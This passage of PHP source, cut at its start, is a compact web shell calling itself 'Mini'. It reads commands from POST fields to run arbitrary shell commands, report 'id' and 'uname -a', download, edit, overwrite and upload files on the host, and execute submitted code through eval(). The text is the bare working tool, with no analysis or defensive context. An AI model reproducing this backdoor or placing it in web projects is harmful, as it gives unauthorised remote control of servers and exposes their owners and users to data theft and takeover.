";} if(version_compare(phpversion(), '4.1.0') == -1) { $_POST=&$HTTP_POST_VARS; } if(@get_magic_quotes_gpc()) foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } $action_edit = false; $dwn_failed = false; if(isset($_POST["action"])) $action = $_POST["action"]; else $action = "cmd"; if(isset($_POST["pwd"])) { $pwd = $_POST["pwd"]; chdir($pwd); } $location = location(); if(($action === "download")&&(isset($_POST["fname"]))) { $fname = $_POST["fname"]; if(file_exists($fname)) { $pathinfo = pathinfo($fname); header("Content-Transfer-Encoding: binary"); header("Content-type: application/x-download"); header("Content-Length: ".filesize($fname)); header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); @readfile($fname); die(); } else $dwn_failed = true; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo "

Mini v$version id: ".cmd("id")." uname: ".cmd("uname -a")." safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."

".hidden_pwd().""; if($action === "cmd") { if(isset($_POST["cmd"])) $cmd = $_POST["cmd"]; else $cmd = "ls -la"; $result = htmlspecialchars(cmd($cmd)); if($result === "") $result = cmd("ls -la"); echo $result; $location = location(); } elseif(($action === "edit")&&(isset($_POST["fname"]))) { $fname = $_POST["fname"]; ob_start(); if(!@readfile($fname)) echo "Cann't open file \"$fname\"."; else $action_edit = true; $result = ob_get_clean(); @ob_end_clean(); echo htmlspecialchars($result); } elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"]))) { $fname = $_POST["fname"]; $data = $_POST["data"]; $fid = @fopen($fname, "w"); $fname = htmlspecialchars($fname); if(!$fid) echo "Cann't save file \"$fname\"."; else { fputs($fid, $data); fclose($fid); echo "File \"$fname\" is saved."; } } elseif(($action === "download")&&($dwn_failed)) echo "Download failed: file \"".htmlspecialchars($fname)."\" not exists."; elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"]))) { $fname = $_POST["fname"]; if(copy($_FILES["file"]["tmp_name"], $fname)) echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes."; else echo "Upload failed!"; } elseif(($action === "eval")&&(isset($_POST["code"]))) { $code = $_POST["code"]; ob_start(); @eval($code); $result = ob_get_clean(); @ob_end_clean(); echo htmlspecialchars($result); } echo "".(($action_edit) ? " " : "")."

Command:  Location:

".hidden_pwd()." Edit file:

"; echo " ".hidden_pwd()." File: "; echo" "; echo " ".hidden_pwd()." File: To file:   "; echo "

".hidden_pwd()."

"; ?>